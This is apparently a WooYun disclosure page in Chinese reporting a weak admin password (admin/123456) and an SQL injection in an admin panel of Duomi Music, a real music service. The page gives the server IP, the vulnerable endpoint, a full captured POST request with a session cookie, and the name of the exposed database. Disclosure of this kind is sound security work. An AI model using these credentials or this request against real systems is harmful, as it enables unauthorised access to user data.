当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0186995

漏洞标题:多米音乐某后台缺陷+sql注入导致大量用户信息泄露

相关厂商:多米音乐

漏洞作者: fuzz-ing

提交时间:2016-03-22 13:38

修复时间:2016-05-06 13:38

公开时间:2016-05-06 13:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

..

详细说明:

厂商悄悄修复以前的漏洞,然后换套系统,然并卵

其实我并没有看以前的漏洞,偶然发现的 http://59.151.12.39/admin/PostsManager/NewPostsList.aspx
弱口令admin 123456进去后发现很多信息,各种审核权限最新的信息,这就不说了
然后这里有个注入

12.png


POST /admin/PostsManager/PostsHandler.ashx?action=GetNewList HTTP/1.1
Host: 59.151.12.39
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://59.151.12.39/admin/PostsManager/NewPostsList.aspx
Content-Length: 82
Cookie: ASP.NET_SessionId=vq0povionfnoujdgm2bylkxx; .ASPXFORMSDEMO=98E8766297A14D6EFB4CE0E97D30B698A9F0D0CF62A02A0E44E9525B13427A84FA807959D97DC45DD884C509017C82B6AD49D9D73E2585B40B7AC5CCEFB144F6B5C9806F22900F90A2DC61655E3E8AF4CDB3FFEBD0369B54612858C0DB0C9093822F35AB409AD7122C8A3DE8F4F3D95AB60C309B35494AAA270882AD03268CCB8DFF231ED3985D961494CA7087AC6AF2B2F54F0342B319204BF82566B8314D85D41642C6348EE70B7488CDBA2F9C797F82842AF63AA159A7940FC211FDED947642988558B959016993E7DFA8981C7B344FDF1B2C2E13411896ABBB6D0C603141C714A1F35844CA5FDC26E33BE4AE57D02114B91C39437A308B9DFC286054564C175259C0F72BA761C46496E452F25F5220C742CF3CFA703F0451D40DFC2BDD1AA0089640E04648511B7C21617755E664B3AB66FDEBE47559423B4A4DED5C51763D82E8E8570258BF3A1DEF43F9F79216ED0503FA3DC9C1D8BED5AAB7577A10E58BB97ACFE09969F49E0991343241EA0AE30CF067EF1077D6CE43E30CB0CC7047679586100C55AF8EC99902B2E57891685F4BE4D471203BAD2431E14A6553C43D6192176D0E2E4716E03D513374D2029B8FC6123DAA044B92198E65D47CABA03205146CB6765CD61C601305AE5241C681B2AFE04383939314AB769A216E6EA6465B928EF8A785C7DF3A23B894423502C6
Connection: close
title=1&startTime=2016%2F03%2F19&endTime=2016%2F03%2F20&status=0&start=0&length=10


当前数据库,看名字就知道量很大
current database: 'fans_bbs'

漏洞证明:

current database: 'fans_bbs'

修复方案:

悄悄修复

版权声明:转载请注明来源 fuzz-ing@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)